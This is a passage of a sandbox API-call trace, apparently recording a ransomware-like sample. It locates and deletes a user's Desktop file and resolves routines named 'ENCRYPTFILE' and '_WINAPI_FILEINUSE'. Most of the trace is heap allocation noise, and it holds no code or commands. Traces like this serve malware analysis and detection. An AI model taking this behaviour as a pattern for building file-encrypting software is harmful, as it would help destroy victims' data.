lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf", lpFilePart=0x0) returned 0x25 [0119.658] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\5nsszwi6b.rtf")) returned 0x20 [0119.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0119.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0119.659] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348b92b0, ftCreationTime.dwHighDateTime=0x1d5ef1d, ftLastAccessTime.dwLowDateTime=0x2fccd30, ftLastAccessTime.dwHighDateTime=0x1d5ef28, ftLastWriteTime.dwLowDateTime=0x2fccd30, ftLastWriteTime.dwHighDateTime=0x1d5ef28, nFileSizeHigh=0x0, nFileSizeLow=0x22f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5NSsZwi6b.rtf", cAlternateFileName="5NSSZW~1.RTF")) returned 0x41ac500 [0119.659] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\5nsszwi6b.rtf")) returned 1 [0119.701] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348b92b0, ftCreationTime.dwHighDateTime=0x1d5ef1d, ftLastAccessTime.dwLowDateTime=0x2fccd30, ftLastAccessTime.dwHighDateTime=0x1d5ef28, ftLastWriteTime.dwLowDateTime=0x2fccd30, ftLastWriteTime.dwHighDateTime=0x1d5ef28, nFileSizeHigh=0x0, nFileSizeLow=0x22f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5NSsZwi6b.rtf", cAlternateFileName="5NSSZW~1.RTF")) returned 0 [0119.701] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0119.701] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0119.701] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0119.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0119.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0119.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0119.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a80e8 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0119.703] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0119.703] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0119.703] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0119.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0119.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0119.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0119.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0119.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0119.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0119.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0119.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0119.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0119.704] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0119.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0119.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0119.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0119.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0119.705] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0119.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0119.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0119.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0119.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0119.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0119.705] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc36e39c0, ftCreationTime.dwHighDateTime=0x1d5ec74, ftLastAccessTime.dwLowDateTime=0x7de735d0, ftLastAccessTime.dwHighDateTime=0x1d5e9d8, ftLastWriteTime.dwLowDateTime=0x7de735d0, ftLastWriteTime.dwHighDateTime=0x1d5e9d8, nFileSizeHigh=0x0, nFileSizeLow=0x50c5, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="9IrmcPpBnuYGc4Yelr9W.mp4", cAlternateFileName="9IRMCP~1.MP4")) returned 0x41ac500 [0119.706] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0119.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0119.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0119.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0119.706] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0119.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0119.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0119.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0119.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0119.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0119.707] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0119.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0119.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0119.708] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0119.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0119.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0119.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0119.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0119.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0119.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c98 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0119.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0119.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0119.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0119.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0119.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0119.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0119.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0119.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0119.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0119.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0119.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0119.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0119.787] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0119.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0119.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0119.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0119.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0119.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0119.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0119.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0119.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.789] RtlAllocateHeap 